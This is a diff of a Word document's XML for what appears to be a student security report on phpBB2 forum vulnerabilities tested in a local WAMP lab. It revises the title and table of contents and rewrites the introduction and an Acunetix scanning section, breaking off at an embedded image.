+                  <v:shape id="Text Box 138" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:17.25pt;margin-top:95.25pt;width:534pt;height:506.25pt;z-index:251659264;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:page;mso-position-vertical:absolute;mso-position-vertical-relative:page;mso-width-percent:0;mso-height-percent:0;mso-width-relative:page;mso-height-relative:page;v-text-anchor:middle" o:gfxdata="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" fillcolor="white [3201]" stroked="f" strokeweight=".5pt">
                     <v:textbox inset="0,0,0,0">
                       <w:txbxContent>
                         <w:tbl>
@@ -388,8 +397,8 @@
                             <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
                           </w:tblPr>
                           <w:tblGrid>
-                            <w:gridCol w:w="5748"/>
-                            <w:gridCol w:w="5444"/>
+                            <w:gridCol w:w="5480"/>
+                            <w:gridCol w:w="5190"/>
                           </w:tblGrid>
                           <w:tr>
                             <w:trPr>
@@ -439,7 +448,16 @@
                                         <w:sz w:val="72"/>
                                         <w:szCs w:val="72"/>
                                       </w:rPr>
-                                      <w:t>Information Security</w:t>
+                                      <w:t>Information S</w:t>
+                                    </w:r>
+                                    <w:r>
+                                      <w:rPr>
+                                        <w:caps/>
+                                        <w:color w:val="191919" w:themeColor="text1" w:themeTint="E6"/>
+                                        <w:sz w:val="72"/>
+                                        <w:szCs w:val="72"/>
+                                      </w:rPr>
+                                      <w:t>ecurity</w:t>
                                     </w:r>
                                   </w:p>
                                 </w:sdtContent>
@@ -711,7 +729,7 @@
           <w:r>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc445123120" w:history="1">
+          <w:hyperlink w:anchor="_Toc446495758" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -738,7 +756,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc445123120 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc446495758 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -781,7 +799,7 @@
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc445123121" w:history="1">
+          <w:hyperlink w:anchor="_Toc446495759" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -808,7 +826,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc445123121 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc446495759 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -851,7 +869,7 @@
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc445123122" w:history="1">
+          <w:hyperlink w:anchor="_Toc446495760" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -879,7 +897,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc445123122 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc446495760 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -922,14 +940,14 @@
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc445123123" w:history="1">
+          <w:hyperlink w:anchor="_Toc446495761" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
                 <w:lang w:val="en"/>
               </w:rPr>
-              <w:t>Enumeration</w:t>
+              <w:t>Entry points</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -950,7 +968,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc445123123 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc446495761 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -971,6 +989,178 @@
                 <w:webHidden/>
               </w:rPr>
               <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="880"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc446495762" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
+                <w:noProof/>
+                <w:lang w:val="en"/>
+              </w:rPr>
+              <w:t></w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:b/>
+                <w:noProof/>
+                <w:lang w:val="en"/>
+              </w:rPr>
+              <w:t>Apache Server</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc446495762 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="880"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc446495763" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
+                <w:noProof/>
+                <w:lang w:val="en"/>
+              </w:rPr>
+              <w:t></w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:b/>
+                <w:noProof/>
+                <w:lang w:val="en"/>
+              </w:rPr>
+              <w:t>PHP Functionality</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc446495763 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>3</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -993,14 +1183,14 @@
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc445123124" w:history="1">
+          <w:hyperlink w:anchor="_Toc446495764" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
                 <w:lang w:val="en"/>
               </w:rPr>
-              <w:t>Penetration/Attack</w:t>
+              <w:t>Enumerating Exploits</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1021,7 +1211,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc445123124 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc446495764 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1041,7 +1231,179 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>3</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="880"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc446495765" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
+                <w:noProof/>
+                <w:lang w:val="en"/>
+              </w:rPr>
+              <w:t></w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:b/>
+                <w:noProof/>
+                <w:lang w:val="en"/>
+              </w:rPr>
+              <w:t>DOS (Denial of service attack)</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc446495765 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>3</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="880"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc446495766" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
+                <w:noProof/>
+                <w:lang w:val="en"/>
+              </w:rPr>
+              <w:t></w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:b/>
+                <w:noProof/>
+                <w:lang w:val="en"/>
+              </w:rPr>
+              <w:t>Session Hijacking exploit</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc446495766 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>3</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1064,14 +1426,14 @@
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc445123125" w:history="1">
+          <w:hyperlink w:anchor="_Toc446495767" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
                 <w:lang w:val="en"/>
               </w:rPr>
-              <w:t>Install back doors</w:t>
+              <w:t>Penetration/Attack</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1092,7 +1454,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc445123125 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc446495767 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1112,77 +1474,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="end"/>
-            </w:r>
-          </w:hyperlink>
-        </w:p>
-        <w:p>
-          <w:pPr>
-            <w:pStyle w:val="TOC2"/>
-            <w:tabs>
-              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
-            </w:tabs>
-            <w:rPr>
-              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
-              <w:noProof/>
-              <w:lang w:eastAsia="en-GB"/>
-            </w:rPr>
-          </w:pPr>
-          <w:hyperlink w:anchor="_Toc445123126" w:history="1">
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t>Covering Tracks</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc445123126 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:t>2</w:t>
+              <w:t>3</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1205,12 +1497,82 @@
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc445123127" w:history="1">
+          <w:hyperlink w:anchor="_Toc446495768" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
+              <w:t>Hardening exploits</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc446495768 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>3</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC1"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc446495769" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
               <w:t>Conclusion</w:t>
             </w:r>
             <w:r>
@@ -1232,7 +1594,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc445123127 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc446495769 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1253,6 +1615,146 @@
                 <w:webHidden/>
               </w:rPr>
               <w:t>3</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC1"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc446495770" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>References</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc446495770 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>4</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC1"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc446495771" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Appendix</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc446495771 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>4</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1300,7 +1802,8 @@
           <w:color w:val="auto"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc445123120"/>
+      <w:bookmarkStart w:id="0" w:name="_Toc446495289"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc446495758"/>
       <w:r>
         <w:rPr>
           <w:color w:val="auto"/>
@@ -1309,306 +1812,873 @@
         <w:t>Introduction</w:t>
       </w:r>
       <w:bookmarkEnd w:id="0"/>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>The version of WAMP server used in this assignment is WAMP5 1.7.0. The main version of PHPBB focused on in this investigation is phpBB2-2.0.23 although</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> vulnerabilities of</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> other versions have also been explored.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> A </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">PHP </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">forum has been set up to practice and </w:t>
-      </w:r>
-      <w:r>
-        <w:t>test</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> these vulnerabilities.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">The general </w:t>
-      </w:r>
-      <w:r>
-        <w:t>attacker’s</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> methodology is used to find and </w:t>
-      </w:r>
-      <w:r>
-        <w:t>execute</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> software exploits within </w:t>
-      </w:r>
-      <w:r>
-        <w:t>the</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> targeted system</w:t>
-      </w:r>
-      <w:r>
-        <w:t>. The methodical steps are listed below</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> with </w:t>
-      </w:r>
-      <w:r>
-        <w:t>a brief description of each</w:t>
-      </w:r>
-      <w:r>
+      <w:bookmarkEnd w:id="1"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>For the purpose of this experiment version 1.7.0 of WAMP has been installed. A PHP forum has been configured on the locally hosted WAMP to practice and test vulnerability exploits of the PHP forum. The main version of PHPBB focused on in this investigation is phpBB2-2.0.23 and 2.0.19 although vulnerabilities of other versions have also been explored.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>There are a wide range of readily available third party software and net based vulnerability scanning tools available for penetration testing a targeted site. The majority of these tools can be used unlawfully without the proper permissions to scan the target website.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="0"/>
+        <w:rPr>
+          <w:color w:val="auto"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:spacing w:before="0"/>
+        <w:rPr>
+          <w:color w:val="auto"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="2" w:name="_Toc446495290"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc446495759"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>Method</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="2"/>
+      <w:bookmarkEnd w:id="3"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:spacing w:before="0"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:spacing w:before="0"/>
+        <w:rPr>
+          <w:color w:val="auto"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="4" w:name="_Toc446495291"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc446495760"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="auto"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Foot-Printing</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="4"/>
+      <w:bookmarkEnd w:id="5"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A free version of </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Acunetrix</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> vulnerabilities scanning tool was downloaded and used to scan the locally hosted PHP forum. This image in figure.1 below illustrates the scan results.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="720"/>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:b/>
+          <w:color w:val="auto"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>0</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
